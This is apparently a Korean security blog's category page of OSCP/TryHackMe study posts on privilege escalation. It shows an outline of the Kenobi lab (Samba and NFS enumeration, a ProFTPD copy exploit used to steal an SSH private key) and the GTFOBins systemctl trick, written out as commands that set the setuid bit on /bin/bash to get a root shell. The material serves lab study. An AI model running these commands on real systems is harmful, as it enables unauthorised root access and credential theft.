권한상승 13

[Linux] Kenobi

Kenobi Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. NMAP -> RPC, NFS, FTP, SMB, SSH 1. smbclient, smbget 2. Nmap nfs 스크립트 검색 (rpcbind) 3. NC로 FTP 배너그래빙 -> searchsploit -> Proftp copy exploit-> 1에서 얻은 로그파일 정보로 위치 파악, ssh개인키를 마운트된 폴더에 복사 -> 내 PC로 mount하여 개인키 다운로드 -> SS..

OSCP/TryHackMe 2020.04.14

Systemctl

https://gtfobins.github.io/gtfobins/systemctl/ 1. systemctl 경로를 환경에 맞게 수정 2. bash 권한에 스티키 비트 추가 구문 수정 TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "chmod +s /bin/bash" [Install] WantedBy=multi-user.target' > $TF ./systemctl link $TF ./systemctl enable --now $TF 위 명령 실행 후.. 스티키비트 생성 확인 $ ls -l /bin/bash 루트 권한 확인 $ /bin/bash -p -p: posix모드..? $ id

11. Privilege Escalation

11. - Privilege Escalation 권한 상승은 기계 또는 네트워크에 대한 접근의 수준을 높이는 과정이다. 대부분의 운영 체제 및 기타 작업 환경에서는 사용자 권한 분리 모델을 준수하기 위해 권한 상승 프로세스가 본질적으로 방지된다. 그러므로, 정의에 따르면, 권한 상승 과정은 이 보안 모델을 깨는 것을 포함할 것이다. 11.1 - 권한 상승 공격 권한상승 표현은 까다로운 것이다. 정의상 대부분의 Exploit은 이 범주에 속한다. 만약 그것들이 작동한다면, 그것들은 기존의 취약성을 성공적으로 이용함으로써 당신의 권한을 어떤 식으로든 타겟 머신에 올릴 것이다. 그러나, 권한상승 이용이라는 용어는 대개 피해자의 기계에서 로컬로 실행되는, 일반적으로 더 높은 특권을 가진 프로세스나 서비스를 이용..